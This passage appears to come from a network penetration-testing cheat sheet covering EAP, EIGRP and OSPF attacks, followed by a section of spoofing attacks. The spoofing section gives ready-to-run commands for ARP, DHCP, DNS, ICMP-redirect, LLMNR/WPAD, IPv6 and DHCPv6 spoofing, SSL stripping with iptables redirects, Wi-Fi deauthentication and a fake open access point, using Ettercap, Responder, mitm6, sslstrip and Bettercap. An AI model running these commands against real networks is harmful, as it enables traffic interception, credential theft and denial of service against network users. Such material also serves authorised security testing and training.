Techniques:

• Protocol Downgrade: The attacker forces the communication to use a less secure EAP method, such as EAP-MD5, which can be more easily compromised.

• Configuration Exploitation: The attacker exploits misconfigurations in the network that allow weaker EAP methods to be used, reducing the overall security of the authentication process.

3. Dictionary Attack on EAP-MD5

Description: EAP-MD5 is a simple EAP method that uses MD5 hashes for authentication. It is vulnerable to dictionary attacks where an attacker attempts to guess the password by comparing hashed guesses against the intercepted hash.

Techniques:

• Hash Interception: The attacker captures the hashed password during the authentication process.

• Offline Cracking: The attacker uses a precomputed dictionary of hashes or brute-force methods to match the intercepted hash to the original password.

4. EAP-PEAP and EAP-TTLS Tunnel Compromise

Description: Protected EAP (PEAP) and Tunneled Transport Layer Security (TTLS) are methods that encapsulate EAP within a secure tunnel. However, if the outer tunnel is compromised, the inner EAP authentication can be exposed to attacks.

Techniques:

• Tunnel Exploitation: The attacker compromises the outer tunnel (e.g., through TLS vulnerabilities), allowing them to intercept and manipulate the inner EAP messages.

• Credential Theft: Once inside the tunnel, the attacker can capture usernames, passwords, and other authentication credentials.

5. Rogue AP and Evil Twin Attack

Description: An attacker sets up a rogue access point (AP) or an evil twin AP with the same SSID as a legitimate AP. This tricks clients into connecting to the rogue AP, where the attacker can capture sensitive information.

Techniques:

• SSID Spoofing: The attacker creates an AP with the same SSID as a legitimate network, luring clients to connect to it.

• Credential Harvesting:** Once connected, the attacker can capture EAP authentication messages, including usernames and passwords.

6. EAP-Failure Spoofing

Description: In this attack, an attacker sends a spoofed EAP-Failure message to a client or server, causing the authentication process to fail prematurely.

Techniques:

• Spoofing: The attacker sends fake EAP-Failure messages to disrupt the authentication process, potentially causing a denial of service (DoS).

• Session Termination: By repeatedly sending EAP-Failure messages, the attacker can prevent legitimate users from successfully authenticating.

EIGRP Attacks

Enhanced Interior Gateway Routing Protocol (EIGRP) is a proprietary routing protocol developed by Cisco Systems. It is designed for use in large enterprise networks, providing fast convergence and scalability. However, like all protocols, EIGRP is not immune to attacks. Understanding these attacks and how to mitigate them is crucial for maintaining network security.

Common EIGRP Attacks

• 1. EIGRP Spoofing: An attacker sends fake EIGRP routing updates to a router. This can cause the router to add incorrect routes to its routing table, leading to network disruption.

• 2. EIGRP Replay Attack: An attacker captures legitimate EIGRP packets and later sends them back into the network. This can confuse routers and lead to incorrect routing decisions.

• 3. Resource Exhaustion: By sending a large number of EIGRP packets, an attacker can overwhelm a router's CPU and memory resources.

• 4. Route Injection: An attacker injects malicious routes into the EIGRP routing domain, causing data to be sent through unauthorized paths.

OSPF

Open Shortest Path First (OSPF) is a widely used interior gateway protocol (IGP) in Internet Protocol (IP) networks. It is employed for routing within an autonomous system (AS) and is defined in the OSPF version 2 and version 3 standards for IPv4 and IPv6, respectively. OSPF is based on the link-state routing algorithm, which enables routers to maintain a complete map of the network topology.

Using Loki and John the Ripper for Attack and Defense

Loki and John the Ripper are tools that can be used to test and secure OSPF networks by simulating attacks and cracking passwords, respectively.

Loki

Loki is a network attack tool that can be used to simulate various attacks on network protocols, including OSPF. It can be employed to:

• Perform OSPF flooding attacks.
• Inject malicious LSAs to disrupt network routing.
• Test the robustness of OSPF implementations.

Example Attack with Loki:

• Preparation: Ensure Loki is installed on a system connected to the target network.

• Initiating an Attack: Use Loki to inject fake LSAs into the OSPF network. This can cause network instability or reroute traffic through a compromised router.

loki -t <target-ip> -p ospf -m flood

This command would flood the OSPF network with fake LSAs, disrupting normal operations.

John the Ripper

John the Ripper is a powerful password cracking tool often used to test the strength of password security.

Steps to Use John the Ripper with OSPF:

• 1. Extract OSPF Passwords: Obtain OSPF authentication passwords from router configurations or captured traffic. This might involve: - Accessing configuration files on routers. - Capturing OSPF traffic using a network sniffer (e.g., Wireshark).

• 2. Cracking the Password: - Save the passwords in a text file (ospf_passwords.txt). - Use John the Ripper to crack the passwords.

Network Spoofing Attacks

Spoofing attacks involve impersonating legitimate network entities to intercept or redirect data. Below are detailed examples and commands for executing various spoofing techniques, using open-source tools to perform these attacks.

DHCP Spoofing

The attacker sends forged DHCP responses to configure the network parameters (Gateway, IP, DNS) of a new member joining the network.

Example:

Tool: Yersinia

yersinia dhcp -attack 2 # Additional parameters required

ARP Spoofing

ARP Spoofing tricks network devices into believing the attacker’s MAC address is associated with the IP address of another device, allowing interception of traffic between devices.

Example:

Tool: Ettercap

ettercap -T -q -i <interface> -M arp:remote /<target1 IP>/ /<target2 IP>/

ICMP Redirect

ICMP Redirect involves sending an ICMP packet type 1 code 5, indicating the attacker is the best route to reach a specific IP. This causes the victim to send traffic through the attacker.

Example:

Tool: hping3

hping3 [VICTIM IP] -C 5 -K 1 -a [VICTIM GW IP] --icmp-gw [ATTACKER IP] --icmp-ipdst [DST IP] --icmp-ipsrc [VICTIM IP]

DNS Spoofing

The attacker resolves certain or all domain queries requested by the victim to malicious addresses.

Example:

Tool: Ettercap

ettercap -T -q -P dns_spoof -M arp /<victim IP>/ /<gateway IP>/

Tool: dnsmasq

apt-get install dnsmasq 
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf 
echo "127.0.0.1 domain.example.com" > dnsmasq.hosts 
sudo dnsmasq -C dnsmasq.conf --no-daemon

Identifying Local Gateways

Multiple routes often exist within a network. Discover potential gateways by identifying MAC addresses supporting IPv4 forwarding.

Example:

Tool: gateway-finder

git clone https://github.com/pentestmonkey/gateway-finder.git 
cd gateway-finder/ 
arp-scan -l | tee hosts.txt 
./gateway-finder.py -f hosts.txt -i 209.85.227.99

Spoofing LLMNR, NBT-NS, and mDNS

Microsoft and Apple systems use LLMNR, NBT-NS, and mDNS for local network name resolution. These unauthenticated protocols can be exploited to redirect traffic to malicious services.

Example:

Tool: Responder

git clone https://github.com/SpiderLabs/Responder.git 
cd Responder 
python3 Responder.py -I <interface>

Spoofing WPAD

WPAD (Web Proxy Auto-Discovery) allows browsers to auto-configure proxy settings. An attacker can trick clients into using a malicious proxy.

Example:

Tool: Responder

git clone https://github.com/SpiderLabs/Responder.git 
cd Responder 
python3 Responder.py -I <interface>

IPv6 Neighbor Spoofing

This attack mimics ARP Spoofing in IPv6 networks, causing the victim to believe the attacker's MAC address corresponds to the network gateway’s IPv6 address.

Example:

Tool: THC-IPv6

sudo parasite6 -l eth0 
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6>

IPv6 Router Advertisement Spoofing/Flooding

Some operating systems configure the gateway from Router Advertisement (RA) packets. Attackers can declare themselves as the IPv6 router.

Example:

Tool: THC-IPv6

sysctl -w net.ipv6.conf.all.forwarding=1 ip route add default via <ROUTER_IPv6> dev wlan0 fake_router6 wlan0 fe80::01/16

IPv6 DHCP Spoofing

Attackers can configure themselves as the DNS server by sending DHCPv6 packets.

Example:

Tool: mitm6

mitm6 -i <interface>

HTTP (Fake Page and JS Code Injection)

Attackers can manipulate HTTP traffic to inject fake pages or JavaScript code.

Example:

Tool: sslstrip

apt-get install sslstrip 
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Using Bettercap for Advanced Spoofing

Bettercap provides a comprehensive framework for network attacks.

Example:

Tool: Bettercap

# Installation 
apt-get install bettercap 
# Events 
bettercap -eval "events.stream off; events.show; events.show 5; events.clear" 
# Ticker 
bettercap -eval "set ticker.period 5; set ticker.commands 'wifi.deauth DE:AD:BE:EF:DE:AD'; ticker on" 
# Caplets 
bettercap -eval "caplets.show; caplets.update" 
# Wifi
bettercap -eval "wifi.recon on; wifi.deauth BSSID; wifi.show"

Creating Fake Wi-Fi Access Point

bettercap -eval "set wifi.ap.ssid Banana; set wifi.ap.bssid DE:AD:BE:EF:DE:AD; set wifi.ap.channel 5; set wifi.ap.encryption false; wifi.recon on; wifi.ap"

Active Discovery Notes

Use tools to discover devices and services on the network.

Tools:

• avahi-browser --all
• Bettercap: bettercap -eval "net.probe.mdns"
• Responder: responder -I <interface>

Additional References

• Network Security Assessment: Know Your Network (3rd edition)

• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things

• Medium Articles:

• Cisco Nightmare: Pentesting Cisco Networks

• Pentesting Cisco Networks Like a Devil